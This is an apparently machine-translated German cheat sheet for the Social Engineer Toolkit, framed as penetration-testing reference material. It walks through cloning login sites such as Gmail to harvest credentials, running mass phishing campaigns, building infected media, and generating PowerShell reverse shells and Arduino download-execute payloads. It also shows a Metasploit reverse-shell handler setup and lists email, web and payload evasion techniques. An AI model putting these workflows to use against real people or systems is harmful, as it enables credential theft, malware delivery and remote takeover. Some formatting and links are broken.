Zum Inhalt

Social Engineer Toolkit (SET)

generieren

Das Social Engineer Toolkit (SET) ist ein offener Penetrationstest für Social Engineering-Angriffe. Entwickelt von David Kennedy (ReL1K) und dem TrustedSec Team automatisiert SET eine Reihe von Social Engineering-Angriffen und bietet eine umfassende Plattform für die Prüfung menschlicher Schwachstellen in Sicherheitsbewertungen.

Installation und Inbetriebnahme

Installation auf Kali Linux

```bash

SET comes pre-installed on Kali Linux

setoolkit

Update SET

cd /opt/set git pull ```_

Manuelle Installation

```bash

Clone repository

git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ cd set/

Install dependencies

pip3 install -r requirements.txt

Run setup

python setup.py install

Launch SET

python setoolkit ```_

Konfiguration

```bash

Edit configuration file

nano /etc/setoolkit/set.config

Key configuration options:

WEBATTACK_EMAIL=ON

APACHE_SERVER=ON

METASPLOIT_PATH=/usr/share/metasploit-framework

SENDMAIL=ON

EMAIL_PROVIDER=GMAIL

```_

Hauptmenü Optionen

1) Social-Engineering Angriffe

```bash

Launch SET

setoolkit

Select option 1 from main menu

Social-Engineering Attacks submenu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Infectious Media Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduino-Based Attack Vector

7) Wireless Access Point Attack Vector

8) QRCode Generator Attack Vector

9) Powershell Attack Vectors

10) Third Party Modules

```_

Spear-Phishing Angriffsvektoren

```bash

Option 1 from Social-Engineering Attacks

Spear-Phishing submenu:

1) Perform a Mass Email Attack

2) Create a FileFormat Payload

3) Create a Social-Engineering Template

Mass Email Attack

- Configure SMTP settings

- Import email list

- Create or select email template

- Attach malicious payload

FileFormat Payload

- Select file format (PDF, DOC, XLS, etc.)

- Choose exploit

- Generate malicious file

Email Templates

- Pre-built templates for common scenarios

- Custom template creation

- HTML email support

```_

Website Angriff Vektoren

```bash

Option 2 from Social-Engineering Attacks

Website Attack submenu:

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method

3) Credential Harvester Attack Method

4) Tabnabbing Attack Method

5) Web Jacking Attack Method

6) Multi-Attack Web Method

7) HTA Attack Method

Credential Harvester

- Clone legitimate websites

- Capture credentials

- Redirect after capture

- Email harvested credentials

Java Applet Attack

- Self-signed Java applet

- Social engineering prompt

- Payload execution after acceptance

Browser Exploit Method

- Metasploit browser exploits

- Automatic exploitation

- Multiple exploit attempts

```_

Angriffszenarien

Credential Harvesting

```bash

Start SET

setoolkit

Select: 1) Social-Engineering Attacks

Select: 2) Website Attack Vectors

Select: 3) Credential Harvester Attack Method

Harvester options:

1) Web Templates

2) Site Cloner

3) Custom Import

Site Cloner example:

Enter URL to clone: https://gmail.com

SET will clone the site and host locally

Captured credentials saved to /root/.set/reports/

```_

Phishing Email Kampagne

```bash

Start SET

setoolkit

Select: 1) Social-Engineering Attacks

Select: 1) Spear-Phishing Attack Vectors

Select: 1) Perform a Mass Email Attack

Configuration steps:

1) Select attack vector (fileformat, etc.)

2) Configure payload

3) Setup email template

4) Configure SMTP settings

5) Import target email list

6) Send campaign

Email list format (emails.txt):

user1@company.com

user2@company.com

user3@company.com

```_

Infektiöser Mediengenerator

```bash

Start SET

setoolkit

Select: 1) Social-Engineering Attacks

Select: 3) Infectious Media Generator

Media options:

1) File-Format Exploits

2) Standard Metasploit Executable

File-Format Exploits:

- PDF exploits

- Microsoft Office exploits

- Browser-based exploits

Standard Executable:

- Windows executable

- Linux executable

- Mac OSX executable

```_

PowerShell Angriffsvektoren

```bash

Start SET

setoolkit

Select: 1) Social-Engineering Attacks

Select: 9) Powershell Attack Vectors

PowerShell options:

1) PowerShell Alphanumeric Shellcode Injector

2) PowerShell Reverse Shell

3) PowerShell Bind Shell

4) PowerShell Dump SAM Database

Reverse Shell example:

Enter IP address for reverse connection

Enter port for reverse connection

Generate PowerShell command

Execute on target system

```_

Erweiterte Techniken

Individuelle Payloads

```bash

Create custom payload

setoolkit

Select: 1) Social-Engineering Attacks

Select: 4) Create a Payload and Listener

Payload options:

1) Windows Shell Reverse_TCP

2) Windows Meterpreter Reverse_TCP

3) Windows Meterpreter Reverse_HTTP

4) Windows Meterpreter Reverse_HTTPS

5) Linux Shell Reverse_TCP

Configuration:

Set LHOST (attacker IP)

Set LPORT (listening port)

Generate payload

Setup listener

```_

Multi-Attack-Webmethode

```bash

Start SET

setoolkit

Select: 1) Social-Engineering Attacks

Select: 2) Website Attack Vectors

Select: 6) Multi-Attack Web Method

Combines multiple attack vectors:

- Java Applet Attack

- Metasploit Browser Exploit

- Credential Harvester

- Tabnabbing

- Web Jacking

Increases success probability

Automatic fallback methods

Comprehensive attack coverage

```_

Arduino-basierte Angriffe

```bash

Start SET

setoolkit

Select: 1) Social-Engineering Attacks

Select: 6) Arduino-Based Attack Vector

Arduino attack types:

1) Powershell HTTP GET MSF Payload

2) WSCRIPT HTTP GET MSF Payload

3) Powershell HTTP POST MSF Payload

4) WSCRIPT HTTP POST MSF Payload

5) Download-Execute Powershell Attack

6) Download-Execute WSCRIPT Attack

Generates Arduino sketch

Physical access required

Automated payload execution

Bypasses software restrictions

```_

Integration mit Metasploit

Aufbau von Metasploit Integration

```bash

Configure Metasploit path in SET

nano /etc/setoolkit/set.config

Set Metasploit path:

METASPLOIT_PATH=/usr/share/metasploit-framework

Start Metasploit listener

msfconsole msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST attacker_ip msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > exploit -j ```_

Automatisiertes Listener Setup

```bash

SET can automatically setup Metasploit listeners

When creating payloads, select:

"Do you want to start the listener now? [y/n]:"

Select 'y' for automatic listener setup

SET will:

1) Generate appropriate payload

2) Start msfconsole

3) Configure handler

4) Start listener

```_

Reporting und Logging

Erstellungsberichte

```bash

Harvested credentials location

/root/.set/reports/

View captured credentials

cat /root/.set/reports/2024-01-01 12:00:00.txt

Email reports (if configured)

Automatic email notifications

Real-time credential capture alerts

```_

Angriffsprotokolle

```bash

SET log files

/root/.set/logs/

View attack logs

tail -f /root/.set/logs/set_logfile.log

Apache access logs (for web attacks)

tail -f /var/log/apache2/access.log

Email logs

tail -f /var/log/mail.log ```_

Berichterstattung

```bash

Generate custom reports

Parse log files for specific information

grep "credential" /root/.set/logs/set_logfile.log

Extract IP addresses

grep -oE "\b([0-9]\\{1,3\\}.)\\{3\\}[0-9]\\{1,3\\}\b" /root/.set/logs/set_logfile.log

Count successful attacks

grep -c "successful" /root/.set/logs/set_logfile.log ```_

Evasion Techniken

E-Mail senden

```bash

Domain reputation management

Use legitimate email providers

Gradual sending patterns

Personalized content

Email headers manipulation

SPF/DKIM configuration

Reply-to address spoofing

Message threading

Content evasion

Image-based content

URL shorteners

Legitimate file hosting

```_

Web Angriff Evasion

```bash

Domain fronting

CDN utilization

SSL/TLS encryption

Legitimate hosting providers

User-Agent rotation

IP address rotation

Traffic timing variation

Legitimate referrer headers

Content delivery

Staged payloads

Encrypted communications

Legitimate file formats

```_

Belastbarkeit Evasion

```bash

Encoding techniques

Encryption methods

Packing/compression

Code obfuscation

Delivery methods

Legitimate file formats

Trusted applications

Signed executables

Execution techniques

Living off the land

PowerShell alternatives

Memory-only execution

```_

Best Practices

Rechtliche und ethische Überlegungen

```bash

Always obtain proper authorization

Document scope and limitations

Follow responsible disclosure

Maintain confidentiality

Create engagement documentation

echo "Social Engineering Test Authorization" > authorization.txt echo "Client: Company Name" >> authorization.txt echo "Scope: Email addresses, domains" >> authorization.txt echo "Date: $(date)" >> authorization.txt echo "Tester: Your Name" >> authorization.txt ```_

Operationelle Sicherheit

```bash

Use dedicated infrastructure

Implement proper logging

Secure communication channels

Regular backup procedures

Infrastructure isolation

Separate testing networks

Dedicated email accounts

Isolated web servers

Data protection

Encrypted storage

Secure transmission

Proper disposal

```_

Prüfverfahren

```bash

Reconnaissance phase

Target identification

Information gathering

Attack vector selection

Execution phase

Payload delivery

Credential harvesting

System compromise

Post-exploitation

Persistence establishment

Data collection

Evidence gathering

Reporting phase

Impact assessment

Remediation recommendations

Executive summary

```_

Fehlerbehebung

Gemeinsame Themen

```bash

Email delivery problems

Check SMTP configuration

Verify DNS settings

Test email connectivity

Web server issues

Check Apache configuration

Verify port availability

Test web connectivity

Payload generation errors

Verify Metasploit integration

Check dependencies

Update SET framework

Permission issues

Run as root user

Check file permissions

Verify directory access

```_

Konfigurationskorrekturen

```bash

Reset SET configuration

rm /etc/setoolkit/set.config setoolkit # Will recreate config

Update SET framework

cd /opt/set git pull python setup.py install

Fix Apache issues

sudo systemctl restart apache2 sudo systemctl enable apache2

Fix email issues

sudo systemctl restart postfix sudo systemctl enable postfix ```_

Ressourcen

  • SET Offizielle Dokumentation
  • [TrustedSec Blog](LINK_5
  • [Social Engineering Framework](LINK_5_
  • [NIST Cybersecurity Framework](LINK_5_
  • (SANS Social Engineering)(LINK_5)